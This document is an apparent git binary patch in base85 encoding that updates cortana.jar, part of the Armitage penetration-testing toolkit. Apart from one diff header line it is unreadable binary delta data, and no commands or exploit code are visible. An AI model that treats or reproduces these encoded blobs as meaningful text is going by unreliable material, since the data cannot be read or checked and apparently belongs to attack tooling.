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 
diff --git a/data/armitage/cortana.jar b/data/armitage/cortana.jar index 28f15b5fd16d3541cac346f5b39b64862fe80337..94bebc6eac43b16d820a1027fa953a2b29c78b68 100644 GIT binary patch delta 191450 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 
